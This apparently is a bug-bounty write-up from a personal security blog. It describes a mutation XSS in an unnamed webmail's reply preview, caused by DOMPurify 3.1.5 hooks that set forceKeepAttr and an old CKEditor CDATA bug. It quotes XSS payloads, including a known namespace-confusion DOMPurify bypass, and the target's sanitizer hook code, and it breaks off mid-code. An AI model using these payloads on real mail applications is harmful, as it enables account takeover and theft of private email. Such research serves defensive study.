<!DOCTYPE html>
<html lang="en"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.8.0 -->
<title>Mutation XSS in a Mail Application via DOMPurify Misconfiguration and CKEditor CDATA Parsing Bug | sudi’s blog</title>
<meta name="generator" content="Jekyll v4.3.4" />
<meta property="og:title" content="Mutation XSS in a Mail Application via DOMPurify Misconfiguration and CKEditor CDATA Parsing Bug" />
<meta name="author" content="sudi" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Write an awesome description for your new site here. You can edit this line in _config.yml. It will appear in your document head meta (for Google search results) and in your feed.xml site description." />
<meta property="og:description" content="Write an awesome description for your new site here. You can edit this line in _config.yml. It will appear in your document head meta (for Google search results) and in your feed.xml site description." />
<link rel="canonical" href="http://localhost:4000/2026/04/07/mxss.html" />
<meta property="og:url" content="http://localhost:4000/2026/04/07/mxss.html" />
<meta property="og:site_name" content="sudi’s blog" />
<meta property="og:image" content="http://localhost:4000/assets/images/mxss/1.png" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2026-04-07T00:00:00+05:30" />
<meta name="twitter:card" content="summary_large_image" />
<meta property="twitter:image" content="http://localhost:4000/assets/images/mxss/1.png" />
<meta property="twitter:title" content="Mutation XSS in a Mail Application via DOMPurify Misconfiguration and CKEditor CDATA Parsing Bug" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"sudi"},"dateModified":"2026-04-07T00:00:00+05:30","datePublished":"2026-04-07T00:00:00+05:30","description":"Write an awesome description for your new site here. You can edit this line in _config.yml. It will appear in your document head meta (for Google search results) and in your feed.xml site description.","headline":"Mutation XSS in a Mail Application via DOMPurify Misconfiguration and CKEditor CDATA Parsing Bug","image":"http://localhost:4000/assets/images/mxss/1.png","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/2026/04/07/mxss.html"},"url":"http://localhost:4000/2026/04/07/mxss.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/css/style.css"><link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="sudi&apos;s blog" />
<link rel="stylesheet" href="/assets/css/custom-dark.css">
</head>
<body><header class="site-header">

  <div class="wrapper"><a class="site-title" rel="author" href="/">sudi&#39;s blog</a><nav class="site-nav">
        <input type="checkbox" id="nav-trigger" class="nav-trigger" />
        <label for="nav-trigger">
          <span class="menu-icon">
            <svg viewBox="0 0 18 15" width="18px" height="15px">
              <path d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.032C17.335,0,18,0.665,18,1.484L18,1.484z M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.032C17.335,6.031,18,6.696,18,7.516L18,7.516z M18,13.516C18,14.335,17.335,15,16.516,15H1.484 C0.665,15,0,14.335,0,13.516l0,0c0-0.82,0.665-1.483,1.484-1.483h15.032C17.335,12.031,18,12.695,18,13.516L18,13.516z"/>
            </svg>
          </span>
        </label>

        <div class="trigger"><a class="page-link" href="/about/">About</a></div>
      </nav></div>
</header>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

  <header class="post-header">
    <h1 class="post-title p-name" itemprop="name headline">Mutation XSS in a Mail Application via DOMPurify Misconfiguration and CKEditor CDATA Parsing Bug</h1>
    <p class="post-meta"><time class="dt-published" datetime="2026-04-07T00:00:00+05:30" itemprop="datePublished">
        Apr 7, 2026
      </time></p>
  </header>

  <div class="post-content e-content" itemprop="articleBody">
    <p>Heyy Everyonee,
I wanted to write about this bug for quite a long time because it’s one of my best xss findings, the time and effort it took to pull this off was immense. Additionally this program doesn’t allow any form of disclosure so sadly there will be no screenshots plus majority of the stuff you will see will be in redacted form.</p>

<p>So where do we even start, I will tell you a little about the target it’s a Mail application similar to Gmail but not really popular I will refer to this target as Redacted Mail. I was able to find a mutation xss bug here, if you have been living under the rocks and not familiar with the term mutation xss I will give a little introduction for that as well in short by sending a crafted mail I could trigger xss in the victim’s browser when they try to view my mail in their inbox. It means with this xss bug I could read all of the victim’s private emails, send any mail to anyone from the victim’s account.</p>

<p>Usually in mail applications you will find they allow you to include html in the mail, this is for proper formatting otherwise all mails would look so ugly in raw text format. Some allow you to include css, hyperlinks and what not but usually all this content gets sanitized it can be either server side or client side or a mix of both. Having them on the client side is beneficial for us because we can look into the source and figure out how the sanitization is happening.</p>

<p>For example Gmail supports the advance markdown formatting and all through AMP</p>

<div class="link-preview">
  <a href="https://developers.google.com/workspace/gmail/ampemail" target="_blank" rel="noopener">
    
    <div class="link-preview-image">
      <img src="https://www.gstatic.com/devrel-devsite/prod/v369eac9380f92e8fedc492e2689927bb3475d758266c381eee326d0b49a77481/developers/images/opengraph/white.png" alt="AMP for Gmail  |  Google for Developers" loading="lazy" />
    </div>
    
    <div class="link-preview-content">
      <div class="link-preview-title">AMP for Gmail  |  Google for Developers</div>
      
      <div class="link-preview-domain">developers.google.com</div>
    </div>
  </a>
</div>

<p>It has been targeted in the past and you can find some very cool writeups for these.
This one from the legend <a href="https://x.com/SecurityMB">Michał Bentkowski</a>. The writeup is already very detailed involves Dom Clobbering to inject arbitrary scripts into the page.</p>
<div class="link-preview">
  <a href="https://web.archive.org/web/20250720221337/https://research.securitum.com/xss-in-amp4email-dom-clobbering/" target="_blank" rel="noopener">
    
    <div class="link-preview-image">
      <img src="https://web.archive.org/web/20250720221337im_/https://research.securitum.com/wp-content/uploads/sites/2/2019/11/image-1.png" alt="XSS in GMail's AMP4Email via DOM Clobbering - research.securitum.com" loading="lazy" />
    </div>
    
    <div class="link-preview-content">
      <div class="link-preview-title">XSS in GMail's AMP4Email via DOM Clobbering - research.securitum.com</div>
      
      <div class="link-preview-description">This post is a write up of an XSS in AMP4Email (obviously already fixed) I reported via Google Vulnerability Reward Program in August 2019. The XSS is an example of a real-world exploitation of well-known browser issue called DOM Clobbering.</div>
      
      <div class="link-preview-domain">web.archive.org</div>
    </div>
  </a>
</div>

<p>Second one is this, which involves an HTML parsing quirk from <a href="https://x.com/agamimaulana">@agamimaulana</a>.</p>

<div class="link-preview">
  <a href="https://asdqw3.medium.com/xss-in-gmail-dynamic-email-amp-for-email-3872d6052a0d" target="_blank" rel="noopener">
    
    <div class="link-preview-image">
      <img src="https://miro.medium.com/v2/resize:fit:617/1*Ye2Tm9CC5eUJfyS8KArAvw.png" alt="XSS in GMAIL Dynamic Email (AMP for Email)" loading="lazy" />
    </div>
    
    <div class="link-preview-content">
      <div class="link-preview-title">XSS in GMAIL Dynamic Email (AMP for Email)</div>
      
      <div class="link-preview-description">I found a XSS vulnerability on GMAIL that I reported to Google VRP on January 2023. This issue occurs due to improper HTML parsing in GMAIL…</div>
      
      <div class="link-preview-domain">asdqw3.medium.com</div>
    </div>
  </a>
</div>

<p>STYLE tags are very special the content inside of STYLE element is treated as RAW text in HTML namespace no html parsing is done in this context which you can see for the element with id 1. The only way to break the context for a STYLE element is through a closing STYLE element you can see the same example using the element with id 2.</p>

<p><img alt="image" src="/assets/images/mxss/1.png" /></p>

<p><br /></p>

<p>If you are a careful reader in my first sentence I used the word HTML namespace (NS), there are three different NS HTML, MATHML and SVG the parsing rules differ across each NS. For eg STYLE is special because it behaves differently depending on the NS in HTML content inside of STYLE is treated as raw text while in MathML/SVG NS the content inside of STYLE element is treated as normal element not raw text.</p>

<p><img alt="image" src="/assets/images/mxss/2.png" /></p>

<p><br /></p>

<p>You will find amateur sanitizers would often miss this case and treat this as a safe string <code class="language-plaintext highlighter-rouge">&lt;style&gt;&lt;a id="&lt;/style&gt;&lt;img src=x onerror=alert()&gt;"&gt;&lt;/style&gt;</code> , a relaxed parser would see the ANCHOR element while it should have treated it as raw content. As the closing STYLE tag is inside the attribute value and the xss vector too they would often skip it considering it as safe I have seen server side sanitizers usually prone to this assumption.</p>

<p>In the AMP bug found by @agamimaulana, you can see his focus was on bypassing the sanitizer using the STYLE element. Google had some checks in place already to avoid letting users include a closing tag inside of STYLE element context this was allowed <code class="language-plaintext highlighter-rouge">&lt;/style</code> as soon as you added the closing character it would flag it.</p>

<p>An explanation around the STYLE element was necessary because my finding relies upon the same quirk in the Redacted Mail as well.</p>

<hr />

<p>Onto the target now, I started by sending a simple payload to my own email, refreshed the mail and clicked on it</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;img src=x onerror=alert()&gt;
</code></pre></div></div>

<p>No popup, wouldn’t be fun if it was that easy right :p. Clicking on the broken image, inspect element I could see the email body content is actually rendered inside a sandbox iframe.</p>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;iframe</span> <span class="na">name=</span><span class="s">"ext"</span> <span class="na">frameborder=</span><span class="s">"0"</span> <span class="na">src=</span><span class="s">"about:blank"</span> <span class="na">class=</span><span class="s">"preview-iframe"</span> <span class="na">tabindex=</span><span class="s">"0"</span> <span class="na">title=</span><span class="s">"message body"</span> <span class="na">aria-atomic=</span><span class="s">"true"</span> <span class="na">role=</span><span class="s">"document"</span> <span class="na">sandbox=</span><span class="s">"allow-same-origin allow-popups allow-popups-to-escape-sandbox"</span> <span class="na">style=</span><span class="s">"overflow: auto;"</span><span class="nt">&gt;&lt;/iframe&gt;</span>
</code></pre></div></div>

<p>This was an instant bummer the content is actually sanitized so some sanitizer was in use but at the same time they are rendering the content inside sandbox. The values for the sandbox attribute are so limited <code class="language-plaintext highlighter-rouge">allow-same-origin allow-popups allow-popups-to-escape-sandbox</code> you can’t have any xss with this. As it lacks the <code class="language-plaintext highlighter-rouge">allow-scripts</code> directive you can’t execute any type of javascript code inside of it. You can ignore the src attribute value being <code class="language-plaintext highlighter-rouge">about:blank</code> that doesn’t mean it’s of different origin, but the sandbox problem is real and there is no way to break out of it total dead end.</p>

<p>The only way to break sandbox iframe is when you have both <code class="language-plaintext highlighter-rouge">allow-scripts</code> and <code class="language-plaintext highlighter-rouge">allow-same-origin</code> directives which allows you to get a reference to the parent window which is not sandboxed where you can execute any code.</p>

<p>I didn’t want to give up so soon as I was just starting so I decided to look more maybe any other area. I had no hope actually but I noticed something very interesting when you click on the Reply button for any mails, this is what happens.</p>

<p><img alt="image" src="/assets/images/mxss/3.png" /></p>

<p><br /></p>

<p>The original mail content is copied and added at the end of the reply mail you can see clearly how the word <code class="language-plaintext highlighter-rouge">testingggg</code> appeared in the reply mail box. In case of Redacted Mail, the reply content was actually rendered outside of the sandbox iframe. The content was still sanitized but yayy we made some progress as the content was no longer inside the sandbox there was a chance that I could get xss here if I can bypass the sanitizer though it will require the victim to click on the reply option still it seemed promising.</p>

<p>Diving into the source to see how they are sanitizing, when a user clicks on an email, the message body of the email is passed to DOMPurify a state of the art sanitizer, the version used is <code class="language-plaintext highlighter-rouge">3.1.5</code> which was a bit old at that time but can be considered totally safe when used with the default configs. There are some custom hooks defined for DOMPurify as well.
I mentioned about the reply option where our sanitized content is rendered without sandbox, so after the content is sanitized using DOMPurify it’s passed to Reply preview feature which is using CKEditor. The sanitized html gets parsed again by CKEditor here you can say, for those of you who don’t know CKEditor has its own inbuilt sanitizer which is also strict.</p>

<p>Luckily the used CKEditor version was old which had a known XSS issue, but there was no public poc available this meant I would need to reverse engineer it.</p>

<div class="link-preview">
  <a href="https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-fq6h-4g8v-qqvm" target="_blank" rel="noopener">
    <div class="link-preview-content">
      <div class="link-preview-title">Cross-site scripting (XSS) vulnerability caused by incorrect CDATA detection</div>
      
      <div class="link-preview-description">GitHub is where people build software. More than 150 million people use GitHub to discover, fork, and contribute to over 420 million projects.</div>
      
      <div class="link-preview-domain">github.com</div>
    </div>
  </a>
</div>

<p>Currently the flow is like this</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Mail Content
    |
    v
DOMPurify Sanitizer (v3.1.5 + custom hooks)
    |
    v
CKEditor (has its own inbuilt sanitizer)
    |
    v
Rendered in the page
</code></pre></div></div>

<p>Pulling off a xss in this scenario looked very difficult as DOMPurify is super strict around everything, it will sanitize inputs in all cases. Problem was even if I am able to build the poc for CKEditor how would I deliver the payload so that it reaches untouched to CKEditor renderer because DOMPurify will surely remove any possible chance of xss no matter what the context is it can deal with everything before passing the same to CKEditor renderer. The only possible way to get xss here would be to find a full DOMPurify bypass which allows you to pass any html to the CKEditor renderer.</p>

<p>Earlier I said DOMPurify is very safe you can trust blindly if you are using it with the default configs plus I said that Redacted Mail is using DOMPurify with some custom hooks.
You might ask what these hooks are</p>

<div class="link-preview">
  <a href="https://github.com/cure53/DOMPurify" target="_blank" rel="noopener">
    
    <div class="link-preview-image">
      <img src="https://opengraph.githubassets.com/ea3806a4ee6fc3fffbe565b2151d0203e07d824f5adb62e0cdbff8b5d89b2b16/cure53/DOMPurify" alt="GitHub - cure53/DOMPurify: DOMPurify - a DOM-only, super-fast, uber-tolerant XSS sanitizer for HTML, MathML and SVG. DOMPurify works with a secure default, but offers a lot of configurability and hooks. Demo:" loading="lazy" />
    </div>
    
    <div class="link-preview-content">
      <div class="link-preview-title">GitHub - cure53/DOMPurify: DOMPurify - a DOM-only, super-fast, uber-tolerant XSS sanitizer for HTML, MathML and SVG. DOMPurify works with a secure default, but offers a lot of configurability and hooks. Demo:</div>
      
      <div class="link-preview-description">DOMPurify - a DOM-only, super-fast, uber-tolerant XSS sanitizer for HTML, MathML and SVG. DOMPurify works with a secure default, but offers a lot of configurability and hooks. Demo: - cure53/DOMPurify</div>
      
      <div class="link-preview-domain">github.com</div>
    </div>
  </a>
</div>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>beforeSanitizeElements
uponSanitizeElement (No 's' - called for every element)
afterSanitizeElements
beforeSanitizeAttributes
uponSanitizeAttribute
afterSanitizeAttributes
beforeSanitizeShadowDOM
uponSanitizeShadowNode
afterSanitizeShadowDOM
</code></pre></div></div>

<p>These hooks allow you to make changes to the sanitized elements/attributes for three events before/after/upon you can read more in the documentation to understand them better.</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  <span class="nx">domPurify</span><span class="p">.</span><span class="nf">addHook</span><span class="p">(</span><span class="dl">"</span><span class="s2">uponSanitizeAttribute</span><span class="dl">"</span><span class="p">,</span> <span class="k">this</span><span class="p">.</span><span class="nx">handleAttribute</span><span class="p">.</span><span class="nf">bind</span><span class="p">(</span><span class="k">this</span><span class="p">)),</span>                                      
  <span class="nx">domPurify</span><span class="p">.</span><span class="nf">addHook</span><span class="p">(</span><span class="dl">"</span><span class="s2">uponSanitizeElement</span><span class="dl">"</span><span class="p">,</span> <span class="k">this</span><span class="p">.</span><span class="nx">handleElement</span><span class="p">.</span><span class="nf">bind</span><span class="p">(</span><span class="k">this</span><span class="p">)),</span>
  <span class="nx">domPurify</span><span class="p">.</span><span class="nf">addHook</span><span class="p">(</span><span class="dl">"</span><span class="s2">afterSanitizeAttributes</span><span class="dl">"</span><span class="p">,</span> <span class="k">this</span><span class="p">.</span><span class="nx">postProcess</span><span class="p">.</span><span class="nf">bind</span><span class="p">(</span><span class="k">this</span><span class="p">))</span>
</code></pre></div></div>

<p>And the relevant hook method definitions</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  <span class="nx">Sanitizer</span><span class="p">.</span><span class="nx">prototype</span><span class="p">.</span><span class="nx">handleAttribute</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">element</span><span class="p">,</span> <span class="nx">data</span><span class="p">)</span> <span class="p">{</span>
      <span class="k">if </span><span class="p">(</span><span class="dl">"</span><span class="s2">target</span><span class="dl">"</span> <span class="o">!==</span> <span class="nx">data</span><span class="p">.</span><span class="nx">attrName</span> <span class="o">||</span> <span class="dl">"</span><span class="s2">_blank</span><span class="dl">"</span> <span class="o">!==</span> <span class="nx">data</span><span class="p">.</span><span class="nx">attrValue</span><span class="p">)</span> <span class="p">{</span>                                              
          <span class="k">if </span><span class="p">(</span><span class="k">this</span><span class="p">.</span><span class="nx">editorRegex</span><span class="p">.</span><span class="nf">test</span><span class="p">(</span><span class="nx">data</span><span class="p">.</span><span class="nx">attrName</span><span class="p">)</span> <span class="o">||</span> <span class="k">this</span><span class="p">.</span><span class="nx">editorRegex</span><span class="p">.</span><span class="nf">test</span><span class="p">(</span><span class="nx">data</span><span class="p">.</span><span class="nx">attrValue</span><span class="p">))</span>
              <span class="nx">data</span><span class="p">.</span><span class="nx">keepAttr</span> <span class="o">=</span> <span class="o">!</span><span class="mi">1</span><span class="p">;</span>                                                                                   
          <span class="k">else</span> <span class="k">if </span><span class="p">(</span><span class="nx">element</span> <span class="k">instanceof</span> <span class="nx">HTMLElement</span> <span class="o">&amp;&amp;</span> <span class="dl">"</span><span class="s2">style</span><span class="dl">"</span> <span class="o">===</span> <span class="nx">data</span><span class="p">.</span><span class="nx">attrName</span><span class="p">.</span><span class="nf">toLowerCase</span><span class="p">())</span>                     
              <span class="nx">data</span><span class="p">.</span><span class="nx">attrValue</span> <span class="o">=</span> <span class="k">this</span><span class="p">.</span><span class="nx">cssSanitizer</span><span class="p">.</span><span class="nf">sanitizeStyleDeclaration</span><span class="p">(</span><span class="nx">element</span><span class="p">.</span><span class="nx">style</span><span class="p">);</span>
          <span class="k">else</span> <span class="k">if </span><span class="p">(</span><span class="dl">"</span><span class="s2">href</span><span class="dl">"</span> <span class="o">===</span> <span class="nx">data</span><span class="p">.</span><span class="nx">attrName</span> <span class="o">&amp;&amp;</span> <span class="nx">data</span><span class="p">.</span><span class="nx">attrValue</span><span class="p">.</span><span class="nf">indexOf</span><span class="p">(</span><span class="dl">"</span><span class="s2">:</span><span class="dl">"</span><span class="p">)</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
              <span class="kd">var</span> <span class="nx">protocol</span> <span class="o">=</span> <span class="p">(</span><span class="nx">data</span><span class="p">.</span><span class="nx">attrValue</span> <span class="o">||</span> <span class="dl">""</span><span class="p">).</span><span class="nf">toLowerCase</span><span class="p">().</span><span class="nf">split</span><span class="p">(</span><span class="dl">"</span><span class="s2">:</span><span class="dl">"</span><span class="p">)[</span><span class="mi">0</span><span class="p">];</span>
              <span class="k">if </span><span class="p">([</span><span class="dl">"</span><span class="s2">tel</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">fax</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">sip</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">mailto</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">callto</span><span class="dl">"</span><span class="p">].</span><span class="nf">includes</span><span class="p">(</span><span class="nx">protocol</span><span class="p">))</span>
                  <span class="k">return</span> <span class="k">void </span><span class="p">(</span><span class="nx">data</span><span class="p">.</span><span class="nx">forceKeepAttr</span> <span class="o">=</span> <span class="o">!</span><span class="mi">0</span><span class="p">)</span>
          <span class="p">}</span>
      <span class="p">}</span> <span class="k">else</span>
          <span class="nx">data</span><span class="p">.</span><span class="nx">forceKeepAttr</span> <span class="o">=</span> <span class="o">!</span><span class="mi">0</span>
  <span class="p">},</span>
  <span class="nx">Sanitizer</span><span class="p">.</span><span class="nx">prototype</span><span class="p">.</span><span class="nx">handleElement</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">element</span><span class="p">,</span> <span class="nx">_data</span><span class="p">)</span> <span class="p">{</span>
      <span class="nx">element</span> <span class="k">instanceof</span> <span class="nx">HTMLStyleElement</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="nx">element</span><span class="p">.</span><span class="nx">textContent</span> <span class="o">=</span> <span class="k">this</span><span class="p">.</span><span class="nx">cssSanitizer</span><span class="p">.</span><span class="nf">sanitizeStyleElement</span><span class="p">(</span><span class="nx">element</span><span class="p">))</span>
  <span class="p">},</span>
  <span class="nx">Sanitizer</span><span class="p">.</span><span class="nx">prototype</span><span class="p">.</span><span class="nx">postProcess</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">element</span><span class="p">)</span> <span class="p">{</span>
      <span class="dl">"</span><span class="s2">target</span><span class="dl">"</span> <span class="k">in</span> <span class="nx">element</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="nx">element</span><span class="p">.</span><span class="nf">setAttribute</span><span class="p">(</span><span class="dl">"</span><span class="s2">target</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">_blank</span><span class="dl">"</span><span class="p">),</span>
      <span class="k">this</span><span class="p">.</span><span class="nx">linkTitleText</span> <span class="o">&amp;&amp;</span> <span class="nx">element</span><span class="p">.</span><span class="nf">setAttribute</span><span class="p">(</span><span class="dl">"</span><span class="s2">title</span><span class="dl">"</span><span class="p">,</span> <span class="k">this</span><span class="p">.</span><span class="nx">linkTitleText</span><span class="p">))</span>
  <span class="p">}</span>
</code></pre></div></div>

<p>The rule of thumb when you are looking for any mxss vectors is there should be no changes to the sanitized output no matter how small or irrelevant can sometimes devalue the use of the sanitizer by allowing full xss.</p>

<p>From now onwards I am going to talk a lot about DOMPurify internals and MXSS so if you aren’t familiar with the MXSS research or the past DOMPurify bypasses I would highly recommend you to have some solid coverage over those topics otherwise it will be hard to follow up and you won’t be able to understand much.</p>

<div class="link-preview">
  <a href="https://mizu.re/post/exploring-the-dompurify-library-bypasses-and-fixes" target="_blank" rel="noopener">
    <div class="link-preview-content">
      <div class="link-preview-title">Exploring the DOMPurify library: Bypasses and Fixes (1/2). Tags:Article - Article - Web - mXSS</div>
      
      <div class="link-preview-description">Exploring the DOMPurify library: Bypasses and Fixes (1/2)</div>
      
      <div class="link-preview-domain">mizu.re</div>
    </div>
  </a>
</div>

<div class="link-preview">
  <a href="https://mizu.re/post/exploring-the-dompurify-library-hunting-for-misconfigurations" target="_blank" rel="noopener">
    <div class="link-preview-content">
      <div class="link-preview-title">Exploring the DOMPurify library: Hunting for Misconfigurations (2/2). Tags:Article - Article - Web - mXSS</div>
      
      <div class="link-preview-description">Exploring the DOMPurify library: Hunting for Misconfigurations (2/2)</div>
      
      <div class="link-preview-domain">mizu.re</div>
    </div>
  </a>
</div>

<p>Shout out to <a href="https://x.com/kevin_mizu">Kévin Gervot</a>, I am super grateful to have had him by my side when I was learning about mxss just to reverse engineer the infamous DOMPurify bypasses which came in 2024. He is super talented at the same time very humble as well.</p>

<p>In Mizu’s second blogpost you will find about cases how DOMPurify can also have some misconfigurations which could allow full bypasses. Our target uses uponSanitizeAttribute, uponSanitizeElement and afterSanitizeAttributes so we will search for those only.</p>

<p>In order to fix the maximum nesting depth bypass vector DOMPurify decided to go after the entrypoint which was the sole reason from where all these bypasses were happening. For MXSS vectors you will find that to break the context after a Namespace confusion, researchers would always smuggle the closing tag inside of attribute values. The very simple example of this is</p>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;style&gt;</span><span class="o">&lt;</span><span class="nt">a</span> <span class="nt">id</span><span class="o">=</span><span class="err">"</span><span class="nt">&lt;/style&gt;&lt;img</span> <span class="na">src=</span><span class="s">x</span> <span class="na">onerror=</span><span class="s">alert()</span><span class="nt">&gt;</span>"&gt;<span class="nt">&lt;/style&gt;</span>
</code></pre></div></div>

<p>Inside the <a href="https://github.com/cure53/DOMPurify/blob/883ac15d47f907cb1a3b5a152fe90c4d8c10f9e6/src/purify.ts#L1383"><code class="language-plaintext highlighter-rouge">_sanitizeAttributes</code></a> method of DOMPurify which is responsible for sanitizing attributes and their values. This check was added</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code>      <span class="cm">/* Work around a security issue with comments inside attributes */</span>
      <span class="k">if </span><span class="p">(</span>
        <span class="nx">SAFE_FOR_XML</span> <span class="o">&amp;&amp;</span>
        <span class="nf">regExpTest</span><span class="p">(</span>
          <span class="sr">/</span><span class="se">((</span><span class="sr">--!</span><span class="se">?</span><span class="sr">|]</span><span class="se">)</span><span class="sr">&gt;</span><span class="se">)</span><span class="sr">|&lt;</span><span class="se">\/(</span><span class="sr">style|script|title|xmp|textarea|noscript|iframe|noembed|noframes</span><span class="se">)</span><span class="sr">/i</span><span class="p">,</span>
          <span class="nx">value</span>
        <span class="p">)</span>
      <span class="p">)</span> <span class="p">{</span>
        <span class="nf">_removeAttribute</span><span class="p">(</span><span class="nx">name</span><span class="p">,</span> <span class="nx">currentNode</span><span class="p">);</span>
        <span class="k">continue</span><span class="p">;</span>
      <span class="p">}</span>
</code></pre></div></div>

<p>The default value for <code class="language-plaintext highlighter-rouge">SAFE_FOR_XML</code> is true and it uses a regex based check for the attribute value this is to ensure there is no closing tag of those elements. All these tags have some special context like STYLE and could be abused to take advantage of any NS confusion attack.
So this fix single handedly ensures no more MXSS could be there.</p>

<p>From Mizu’s blogpost you can find the full poc for the DOMPurify bypasses and you could notice how the closing style tag is placed inside the attribute value.</p>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;r</span><span class="na">*503</span><span class="nt">&gt;</span>
<span class="nt">&lt;a&gt;&lt;svg&gt;&lt;desc&gt;&lt;svg&gt;&lt;image&gt;&lt;a&gt;&lt;desc&gt;&lt;svg&gt;&lt;image&gt;&lt;/image&gt;&lt;/svg&gt;&lt;/desc&gt;&lt;/a&gt;&lt;/image&gt;</span>
<span class="nt">&lt;style&gt;</span><span class="o">&lt;</span><span class="nt">a</span> <span class="nt">id</span><span class="o">=</span><span class="err">"</span><span class="nt">&lt;/style&gt;&lt;img</span> <span class="na">src=</span><span class="s">x</span> <span class="na">onerror=</span><span class="s">alert(1)</span><span class="nt">&gt;</span>"&gt;<span class="nt">&lt;/a&gt;&lt;/style&gt;</span>
<span class="nt">&lt;/svg&gt;&lt;/desc&gt;&lt;/svg&gt;&lt;/a&gt;</span>
</code></pre></div></div>

<p>The creator behind DOMPurify can be considered the god of XSS <a href="https://cure53.de/">Dr.-Ing. Mario Heiderich</a>, if you aren’t familiar with his work would definitely recommend to check out all of his past researches and talks super insightful if you are someone who loves client side stuff and browsers.</p>

<p>In DOMPurify version 3.1.5, there was a quirk related to the <code class="language-plaintext highlighter-rouge">uponSanitizeAttribute</code> hook in conjunction with the <code class="language-plaintext highlighter-rouge">forceKeepAttr</code> of the callback hook event.</p>

<p><img alt="image" src="/assets/images/mxss/4.png" /></p>

<p><br /></p>

<p>In the example code you can see <code class="language-plaintext highlighter-rouge">currentNode.nodeName.toUpperCase()</code> if the value of this is <code class="language-plaintext highlighter-rouge">A</code> (meaning it’s an anchor tag) and the attribute name which is going to be sanitized is equal to <code class="language-plaintext highlighter-rouge">data-x</code>, the <code class="language-plaintext highlighter-rouge">hookEvent.forceKeepAttr</code> property is set to true.</p>

<p>Now let’s see what happens in DOMPurify code when it sees the <code class="language-plaintext highlighter-rouge">hookEvent.forceKeepAttr</code> as true, it simply calls the continue statement??</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">_executeHook</span><span class="p">(</span><span class="dl">'</span><span class="s1">uponSanitizeAttribute</span><span class="dl">'</span><span class="p">,</span> <span class="nx">currentNode</span><span class="p">,</span> <span class="nx">hookEvent</span><span class="p">);</span>
<span class="nx">value</span> <span class="o">=</span> <span class="nx">hookEvent</span><span class="p">.</span><span class="nx">attrValue</span><span class="p">;</span>
<span class="cm">/* Did the hooks approve of the attribute? */</span>
<span class="k">if </span><span class="p">(</span><span class="nx">hookEvent</span><span class="p">.</span><span class="nx">forceKeepAttr</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">continue</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// [...]</span>

<span class="cm">/* Work around a security issue with comments inside attributes */</span>
<span class="k">if </span><span class="p">(</span><span class="nx">SAFE_FOR_XML</span> <span class="o">&amp;&amp;</span> <span class="nf">regExpTest</span><span class="p">(</span><span class="sr">/</span><span class="se">((</span><span class="sr">--!</span><span class="se">?</span><span class="sr">|]</span><span class="se">)</span><span class="sr">&gt;</span><span class="se">)</span><span class="sr">|&lt;</span><span class="se">\/(</span><span class="sr">style|title</span><span class="se">)</span><span class="sr">/i</span><span class="p">,</span> <span class="nx">value</span><span class="p">))</span> <span class="p">{</span>
    <span class="nf">_removeAttribute</span><span class="p">(</span><span class="nx">name</span><span class="p">,</span> <span class="nx">currentNode</span><span class="p">);</span>
    <span class="k">continue</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>In this scenario the safety checks are completely skipped, reviving the old bypasses again. Actually DOMPurify implemented fixes around Nesting depth as well which was the core quirk of the browser which allowed all these bypasses but Mizu along with some other client side legends were finding bypasses here and there, this is the same story whenever there is a new type of DOMPurify bypass you will see many more similar variants. At last after playing a game of cat and mouse, a proper fix was to kill the chain itself using that regex check and the previously added nested depth checks were removed in later versions.</p>

<p>As a fix for this, the if condition check for <code class="language-plaintext highlighter-rouge">hookEvent.forceKeepAttr</code> is now placed after the regex check.</p>

<p>In our target it had the same misconfiguration and super luckily the version used here was <code class="language-plaintext highlighter-rouge">3.1.5</code>, this was a moment to shine.</p>

<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  <span class="nx">Sanitizer</span><span class="p">.</span><span class="nx">prototype</span><span class="p">.</span><span class="nx">handleAttribute</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">element</span><span class="p">,</span> <span class="nx">data</span><span class="p">)</span> <span class="p">{</span>
